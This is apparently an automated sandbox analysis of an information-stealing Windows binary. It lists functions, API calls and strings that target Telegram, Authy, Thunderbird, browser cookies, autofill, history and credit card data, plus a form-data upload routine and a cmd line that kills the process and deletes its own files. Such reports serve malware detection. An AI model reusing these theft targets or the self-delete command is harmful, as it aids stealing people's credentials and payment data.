Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 0041220C
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 0041221A

Strings

APPDATA, xrefs: 00414DAB, 00415307
*.cookie, xrefs: 00414EC6
LOCALAPPDATA, xrefs: 00414E50, 00414F04
Thunderbird, xrefs: 004152AD
map*, xrefs: 0041537D
\CryptoTab Browser\User Data\, xrefs: 00415271
*.txt, xrefs: 00414E21, 00414F6D
key_datas, xrefs: 00415353
\Telegram Desktop\, xrefs: 00415348
CryptoTab Browser, xrefs: 0041526C
D877F783D5D3EF8C*, xrefs: 0041536B
\Thunderbird\Profiles\, xrefs: 004152B2

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$lstrcat$_memset$AddressProc__wgetenv$H_prolog3$CreateDirectory$DeleteFileProcess_memmove$CloseH_prolog3_catch_HandleLibraryLoadOpenTerminateVersion__getenv_helper_nolock__lock_free_strnlen
String ID: *.cookie$*.txt$APPDATA$CryptoTab Browser$D877F783D5D3EF8C*$LOCALAPPDATA$Thunderbird$\CryptoTab Browser\User Data\$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
API String ID: 2957431141-3347235640
Opcode ID: a87791e2d345e23b6844a243f8d4becbc291deafe6820b312ea54c8cd01a1b79
Instruction ID: 5f3eaf53055c4b8f83347f078811056876cc6a46163f3b24e07ec08fd0e81f75
Opcode Fuzzy Hash: a87791e2d345e23b6844a243f8d4becbc291deafe6820b312ea54c8cd01a1b79
Instruction Fuzzy Hash: 96F16070904244AFDF06FF66DD569AD3F66BFA4309B04003FF802272A1DABA4A54DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412B76, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 173filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00412BC8
lstrcatA.KERNEL32(?,\temp), ref: 00412BDA
CopyFileA.KERNEL32(?,?,00000001), ref: 00412BEA
_memset.LIBCMT ref: 00412BF7
_sprintf.LIBCMT ref: 00412C09
DeleteFileA.KERNEL32(?), ref: 00412D78

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 00412CAB
_fprintf.LIBCMT ref: 00412CB2

Part of subcall function 0046835C: __lock_file.LIBCMT ref: 004683A3
Part of subcall function 0046835C: __stbuf.LIBCMT ref: 00468427
Part of subcall function 0046835C: __output_l.LIBCMT ref: 00468437
Part of subcall function 0046835C: __ftbuf.LIBCMT ref: 00468441

_fprintf.LIBCMT ref: 00412CBE
_fprintf.LIBCMT ref: 00412CC5
_fprintf.LIBCMT ref: 00412CD6
_fprintf.LIBCMT ref: 00412CDD

Part of subcall function 00412474: __EH_prolog3_GS.LIBCMT ref: 0041247B
Part of subcall function 00412474: _memset.LIBCMT ref: 004124D6
Part of subcall function 00412474: LocalAlloc.KERNEL32 ref: 00412511

_fprintf.LIBCMT ref: 00412D21

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

_fprintf.LIBCMT ref: 00412D3D

Strings

Year: %s, xrefs: 00412CD0
Month: %s, xrefs: 00412CB8
Name: %s, xrefs: 00412CA2
CC\%s_%s.txt, xrefs: 00412C03
Card: %s, xrefs: 00412D15
\temp, xrefs: 00412BCE

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryH_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memmove_sprintflstrcat
String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp
API String ID: 3490499488-3508537252
Opcode ID: 2396dbf9ee3e1e3d0eafdaa860f3d2f4b5cbe97e5fb546f5e64c096204eadefe
Instruction ID: 91c911e916729c436df81f36103b2bca02794671e4c6e27571ba552f4cf11a64
Opcode Fuzzy Hash: 2396dbf9ee3e1e3d0eafdaa860f3d2f4b5cbe97e5fb546f5e64c096204eadefe
Instruction Fuzzy Hash: D6518272940208ABDF21ABA1DC42FDE77BCAF04708F20052FF904B7192EF7999458B59

Uniqueness

Uniqueness Score: -1.00%

Function 004128C0, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 228stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00412912
lstrcatA.KERNEL32(?,\temp), ref: 00412927
CopyFileA.KERNEL32(?,?,00000001), ref: 00412930
_memset.LIBCMT ref: 00412940
lstrcatA.KERNEL32(?), ref: 00412955
lstrcatA.KERNEL32(?,004867F4), ref: 00412963
lstrcatA.KERNEL32(?,?), ref: 0041296F
lstrcatA.KERNEL32(?,00488A04), ref: 0041297D
lstrcatA.KERNEL32(?,?), ref: 00412989
lstrcatA.KERNEL32(?,.txt), ref: 00412997
DeleteFileA.KERNEL32(?), ref: 00412B58

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

lstrcatA.KERNEL32(?), ref: 00412A76
lstrcatA.KERNEL32(?), ref: 00412AA0
lstrcatA.KERNEL32(?,004886F4), ref: 00412AB5
_fprintf.LIBCMT ref: 00412B04
_fprintf.LIBCMT ref: 00412B20

Strings

%s%s%s%s%s%s%s, xrefs: 00412AFC
.txt, xrefs: 0041298B
\temp, xrefs: 0041291E

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
String ID: %s%s%s%s%s%s%s$.txt$\temp
API String ID: 1987428508-1558371589
Opcode ID: 81c4911eac8a4a4a0438bb6619e481cf43ca5f1724d55685de3ee5b37c5e38da
Instruction ID: 7ce8129a2802f398fc72dbf2ef0ab1cff2e98d7b49b8b5524b4d8ca9a7786b49
Opcode Fuzzy Hash: 81c4911eac8a4a4a0438bb6619e481cf43ca5f1724d55685de3ee5b37c5e38da
Instruction Fuzzy Hash: 1B718072D00248AFEF20AFE5DC41FDEBBB9EF04304F10042AF504EB1A1EA7999549B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E237, Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 196fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E23E
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,0040C825,logs,?,00000001,?,00000001), ref: 0040E261
GetFileSize.KERNEL32(00000000,00000000,?,00000001), ref: 0040E275
CloseHandle.KERNEL32(?,?,00000001), ref: 0040E286

Strings

., xrefs: 0040E2FF
jpg, xrefs: 0040E319
Content-Disposition: form-data; name=", xrefs: 0040E3AF
image/png, xrefs: 0040E367
png, xrefs: 0040E354
", xrefs: 0040E3E5
image/gif, xrefs: 0040E34D
image/tiff, xrefs: 0040E37E
"; filename=", xrefs: 0040E3C5
tiff, xrefs: 0040E36E
image/jpeg, xrefs: 0040E333
Content-Type: , xrefs: 0040E3F1
gif, xrefs: 0040E33A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateH_prolog3_HandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 3151384386-4065671631
Opcode ID: d43d5df8090efd71ded8e5e8e1372e92f45a11b09b3af872d3700a9dd59e51b5
Instruction ID: 5f9dc999d8e4efecb811950ffe2a50289651f9179956f6ace4097c70ae0cad71
Opcode Fuzzy Hash: d43d5df8090efd71ded8e5e8e1372e92f45a11b09b3af872d3700a9dd59e51b5
Instruction Fuzzy Hash: 6F618F31F44308AADB10EBA5C891EEEB7B8AF54B04F10452FF502B71C2DB785A49CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414747, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 413COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00414751

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 004625F7: __EH_prolog3_GS.LIBCMT ref: 00462601
Part of subcall function 004625F7: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
Part of subcall function 004625F7: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

Part of subcall function 0040326C: std::_Xinvalid_argument.LIBCPMT ref: 00403286

_fprintf.LIBCMT ref: 00414A32
_fprintf.LIBCMT ref: 00414A42
_fprintf.LIBCMT ref: 00414AA5
_fprintf.LIBCMT ref: 00414AB5
_fprintf.LIBCMT ref: 00414AF8
_fprintf.LIBCMT ref: 00414B27
_fprintf.LIBCMT ref: 00414B37
_fprintf.LIBCMT ref: 00414B47
_fprintf.LIBCMT ref: 00414B5A
_fprintf.LIBCMT ref: 00414B7D
_fprintf.LIBCMT ref: 00414B8E
_fprintf.LIBCMT ref: 00414BB2
_fprintf.LIBCMT ref: 00414BBE
_fprintf.LIBCMT ref: 00414BE7
_fprintf.LIBCMT ref: 00414BF7

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

FALSE, xrefs: 00414A37, 00414AAA, 00414B2C, 00414B4F

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
String ID: FALSE
API String ID: 1663285408-4287395501
Opcode ID: 44a1ec462830f477418d8046bd11bf3d3bf45db8058350e6f9ab0a74b709057e
Instruction ID: 1637e8c4a4832394d7d9e27fab7e908c34394cd2b1fbd05082f64e739c0d9bda
Opcode Fuzzy Hash: 44a1ec462830f477418d8046bd11bf3d3bf45db8058350e6f9ab0a74b709057e
Instruction Fuzzy Hash: 93F16CB1804218AADB24EB59DD91FEEB778AF51304F1041EFE10AB2181EB745EC4DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0045EFEC, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 185registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0045F00E

Part of subcall function 00411D0F: __EH_prolog3.LIBCMT ref: 00411D16

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,00000000,00000003,00000001,004866C4,00000000,000000CC), ref: 0045F08C
RegEnumKeyExA.KERNEL32(?,?,?,0000000F,00000000,00000000,00000000,00000000), ref: 0045F0D9
wsprintfA.USER32 ref: 0045F100
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0045F114
RegCloseKey.ADVAPI32(?), ref: 0045F121
RegCloseKey.ADVAPI32(?), ref: 0045F12A

Part of subcall function 00411D79: __EH_prolog3.LIBCMT ref: 00411D80

Strings

DisplayVersion, xrefs: 0045F183
%s\%s, xrefs: 0045F0FA
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0045F069, 0045F06E, 0045F0F1, 0045F0F6
DisplayName, xrefs: 0045F145

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prolog3Open$EnumH_prolog3_catch_memmovewsprintf
String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 951852247-3586320934
Opcode ID: dce77e8c28fb35279812e49b463e6373fef6250b45cedeb49a8726129dcfb625
Instruction ID: a6d70bf56b8a510df44a81cb25e35a6ae6e07f0f0a97d699acee502c4b1abd0f
Opcode Fuzzy Hash: dce77e8c28fb35279812e49b463e6373fef6250b45cedeb49a8726129dcfb625
Instruction Fuzzy Hash: 31611FB280014DAFDB14EFD1DC85EEEBBBCEB18304F10447BFA05A6151DB385A498B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041442A, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 240fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00414449
__wgetenv.LIBCMT ref: 00414455

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004625F7: __EH_prolog3_GS.LIBCMT ref: 00462601
Part of subcall function 004625F7: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
Part of subcall function 004625F7: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 00414501
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414538

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

CopyFileW.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00414667

Strings

APPDATA, xrefs: 0041444E
\files\Soft, xrefs: 004144DC
\Authy Desktop\Local Storage\*.localstorage, xrefs: 00414487
\files\Soft\Authy, xrefs: 00414517
\Authy Desktop\Local Storage\, xrefs: 0041460D
files\Soft\Authy, xrefs: 0041454D

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
API String ID: 2019322786-2614104896
Opcode ID: c84ff705d4cc009a16346d4ea3c061a2c9995160962c8d340f0355ee02656293
Instruction ID: b37ebf5b85b8fef535ef3d422051867b4bb99f4d020c96e9198faaebce568709
Opcode Fuzzy Hash: c84ff705d4cc009a16346d4ea3c061a2c9995160962c8d340f0355ee02656293
Instruction Fuzzy Hash: 999150B1800148EFDB25EFA4CD85EEE777CAF55308F00416EB809AB181EA785B04DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED4B, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 112filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040ED8B
lstrcatA.KERNEL32(?,\temp), ref: 0040ED9D
CopyFileA.KERNEL32(?,?,00000001), ref: 0040EDAD
_memset.LIBCMT ref: 0040EDBB
_sprintf.LIBCMT ref: 0040EDCD
DeleteFileA.KERNEL32(?), ref: 0040EE88

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040EE48
_fprintf.LIBCMT ref: 0040EE53

Strings

Autofill\%s_%s.txt, xrefs: 0040EDC7
%s%s, xrefs: 0040EE42
\temp, xrefs: 0040ED91

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
String ID: %s%s$Autofill\%s_%s.txt$\temp
API String ID: 2288810340-2986410175
Opcode ID: adcc6ed10b163b898c6100ad2b105619f1f7037777f09eb332604764768072c5
Instruction ID: cbeb1ee45e60e281374ad0e2034c1c800f98a584e3b24c66d511856a5f9fae5f
Opcode Fuzzy Hash: adcc6ed10b163b898c6100ad2b105619f1f7037777f09eb332604764768072c5
Instruction Fuzzy Hash: 21319372904108AEEF30AFB2DC45EDF77ACAF05704F20052FF504B3152EA395A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEA6, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEE6
lstrcatA.KERNEL32(?,\temp), ref: 0040EEF8
CopyFileA.KERNEL32(?,?,00000001), ref: 0040EF08
_memset.LIBCMT ref: 0040EF16
_sprintf.LIBCMT ref: 0040EF28
DeleteFileA.KERNEL32(?), ref: 0040EFD2

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040EF9D

Strings

SELECT url FROM urls, xrefs: 0040EF4F
%s, xrefs: 0040EF97
History\%s_%s.txt, xrefs: 0040EF22
\temp, xrefs: 0040EEEC

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
API String ID: 440339207-2199967400
Opcode ID: 859e09215009610e198642e590b9aa17e9bd0646ac73971eba97985cbb47cf90
Instruction ID: c4c523648f7c9ddd10085a75586f10a9fc81ac4fe7dcbaa1423c284c77170ff7
Opcode Fuzzy Hash: 859e09215009610e198642e590b9aa17e9bd0646ac73971eba97985cbb47cf90
Instruction Fuzzy Hash: EB318372944108AEEB30AFB2DC45EDE776CEF05714F20042FF505F2152EA399A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F030
lstrcatA.KERNEL32(?,\temp), ref: 0040F042
CopyFileA.KERNEL32(?,?,00000001), ref: 0040F052
_memset.LIBCMT ref: 0040F060
_sprintf.LIBCMT ref: 0040F072
DeleteFileA.KERNEL32(?), ref: 0040F122

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

_fprintf.LIBCMT ref: 0040F0ED

Strings

%s%s, xrefs: 0040F0E7
Downloads\%s_%s.txt, xrefs: 0040F06C
\temp, xrefs: 0040F036

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s%s$Downloads\%s_%s.txt$\temp
API String ID: 440339207-2902098628
Opcode ID: 575470fcddeb759c1383798cef9d139b450044048b4322df54ce0c46a927228a
Instruction ID: 63e679a688cb4e1223aa7c6d4bcbf1b9909be065fca5b70f9b9156e32280bbec
Opcode Fuzzy Hash: 575470fcddeb759c1383798cef9d139b450044048b4322df54ce0c46a927228a
Instruction Fuzzy Hash: 05316272944208AEEF30ABB1DC45EDF77ACAF05714F20053FF509B7152EA3999448B69

Uniqueness

Uniqueness Score: -1.00%

Function 004047F3, Relevance: 16.7, APIs: 11, Instructions: 152stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004047FD

Part of subcall function 0040D995: _memset.LIBCMT ref: 0040D9A3
Part of subcall function 0040D995: _strcpy_s.LIBCMT ref: 0040D9B9
Part of subcall function 0040D995: _memset.LIBCMT ref: 0040D9D4

_memset.LIBCMT ref: 00404831
_memset.LIBCMT ref: 0040483F
_strtok.LIBCMT ref: 00404865
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404889
lstrcatA.KERNEL32(?,00000000,?,00000010,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048AF
lstrcatA.KERNEL32(?,00000001,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 004048CC
lstrcatA.KERNEL32(?,?,00000000,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404902
lstrcatA.KERNEL32(?,?,?,004866C4,0000FDE9,00000000,00000000,00000000,00000394), ref: 00404911
ShellExecuteA.SHELL32(00000000,00000000,?,004866C4,00000000,00000000), ref: 004049C1

Part of subcall function 0040DA1F: _memset.LIBCMT ref: 0040DA29

_strtok.LIBCMT ref: 004049DA

Part of subcall function 004688ED: __getptd.LIBCMT ref: 0046890B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memsetlstrcat$_strtok$ExecuteH_prolog3_Shell__getptd_strcpy_s
String ID:
API String ID: 230071149-0
Opcode ID: d5ad8f808d0b2734b57b4ef2c43003ee14d232df8916db86ffe9fd693c606024
Instruction ID: 484bb8ec39e8ebd3d6e6f9a4084da350e7f74f481ce95393aa71437f7627f88b
Opcode Fuzzy Hash: d5ad8f808d0b2734b57b4ef2c43003ee14d232df8916db86ffe9fd693c606024
Instruction Fuzzy Hash: B6515EB180015CAEDB25EB61CD89FDE777CEB54308F0005EAA109A3191EB786F88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDDE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 239networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040DDFD
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040DE37
InternetReadFile.WININET(00000010,?,000003E8,?), ref: 0040DE51
_memmove.LIBCMT ref: 0040DE86
_memset.LIBCMT ref: 0040DEB7
HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 0040DECD
_memcpy_s.LIBCMT ref: 0040DFFC
_memcpy_s.LIBCMT ref: 0040E024

Strings

text, xrefs: 0040DF5A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternet_memcpy_s$H_prolog3HttpInfoPointerQueryRead_memmove_memset
String ID: text
API String ID: 1895411410-999008199
Opcode ID: 29559fd7c0f8bfea2aed922a597313acc32ca1d562e348907443a2dd625172d6
Instruction ID: 623bac6b6825a502e6a2054dcebc08deb5fb4c8a3fc0d349ec666da5264729df
Opcode Fuzzy Hash: 29559fd7c0f8bfea2aed922a597313acc32ca1d562e348907443a2dd625172d6
Instruction Fuzzy Hash: 969157B1900209AFCB10DFA9C9859AFBBF9FF48304F54452EE506A7651E738A940CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004640D3, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00464108
GetFileSize.KERNEL32(?,00000000), ref: 00464182
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0046419E
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 004641B2
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 004641BB
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641CB
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004641E9
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004641F9

Strings

, xrefs: 00464155

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: ddd5431c41b4e482e9bac3aaeed306e113440fb9dfcae7e9962527fe5a873ffc
Instruction ID: 8a129dbfa4638869f91b893caa8369f02664d8e473c2117139340baf75a24eea
Opcode Fuzzy Hash: ddd5431c41b4e482e9bac3aaeed306e113440fb9dfcae7e9962527fe5a873ffc
Instruction Fuzzy Hash: 2D6105B1D00218AFDF24DFD5DC85AEEBBB8EB89344F14442AE511E7260E7389D418F56

Uniqueness

Uniqueness Score: -1.00%

Function 0045F24F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045F268
GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000010), ref: 0045F29B
GetProcAddress.KERNEL32(00000000), ref: 0045F2A2
_memset.LIBCMT ref: 0045F2B6
GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0045F2C9

Part of subcall function 004621BC: __EH_prolog3_GS.LIBCMT ref: 004621C6

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

GlobalMemoryStatus.KERNEL32 ref: 0045F342

Strings

MB, xrefs: 0045F2EA, 0045F35B
kernel32.dll, xrefs: 0045F290
GlobalMemoryStatusEx, xrefs: 0045F28A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus_memmove$AddressH_prolog3H_prolog3_HandleModuleProc_memset
String ID: MB$GlobalMemoryStatusEx$kernel32.dll
API String ID: 59999723-2756951423
Opcode ID: 4b4a3dec8c0a31a5fa80798c98f0019459b135bfc2ad2fceee3c3a54d872c69d
Instruction ID: 8ce22812fdd117855182cbd810cab7dc4658fcb0650cff4aa089ca83ac53d02f
Opcode Fuzzy Hash: 4b4a3dec8c0a31a5fa80798c98f0019459b135bfc2ad2fceee3c3a54d872c69d
Instruction Fuzzy Hash: 224176B1900249ABDB01EF95CD45BDE7BF8AF54704F10442FF905E3281EB789604C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00461F90, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00461F9A
GetCurrentProcessId.KERNEL32(000000CC,0040C927), ref: 00461FA7

Part of subcall function 004616AB: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004616D6
Part of subcall function 004616AB: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004616F0
Part of subcall function 004616AB: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 004616F6

GetCurrentProcessId.KERNEL32 ref: 00461FC3

Part of subcall function 00461EAE: __EH_prolog3_catch.LIBCMT ref: 00461ECD
Part of subcall function 00461EAE: _memset.LIBCMT ref: 00461EFF
Part of subcall function 00461EAE: OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 00461F11
Part of subcall function 00461EAE: EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F28
Part of subcall function 00461EAE: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F3E
Part of subcall function 00461EAE: CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 00461F44

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 00462097

Strings

" & del C:\ProgramData\*.dll, xrefs: 00462010
C:\Windows\System32\cmd.exe, xrefs: 00462090
/c taskkill /im , xrefs: 00461FDA
& exit, xrefs: 00462026
/f & timeout /t 6 & del /f /q ", xrefs: 00461FE9

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileH_prolog3_H_prolog3_catchModulesShell_memmove_memset
String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
API String ID: 1929281448-455057220
Opcode ID: 2d536ac1764c597662bc426fe5b7089d1d47ffb1e56424c1ce0d6a0e6ebcf09b
Instruction ID: a45b90e52ce3f7aac79a59e641f5e3feb6d633a7628854ba5ce20b82e25033e5
Opcode Fuzzy Hash: 2d536ac1764c597662bc426fe5b7089d1d47ffb1e56424c1ce0d6a0e6ebcf09b
Instruction Fuzzy Hash: 673130B1801118BADB11EBE9CD85ECF7E7C9F15304F10456BF10AB2092EA785A44DB79

Uniqueness

Uniqueness Score: -1.00%

Function 0045FABF, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 307processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0045FAC9

Part of subcall function 00411D0F: __EH_prolog3.LIBCMT ref: 00411D16

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 004033B8: _memmove.LIBCMT ref: 00403409

CreateToolhelp32Snapshot.KERNEL32 ref: 0045FB61
Process32First.KERNEL32(00000000,00000128), ref: 0045FB74
Process32Next.KERNEL32 ref: 0045FB8E

Part of subcall function 004112B7: __EH_prolog3_catch.LIBCMT ref: 004112BE

Part of subcall function 0045E95C: __EH_prolog3_catch.LIBCMT ref: 0045E963

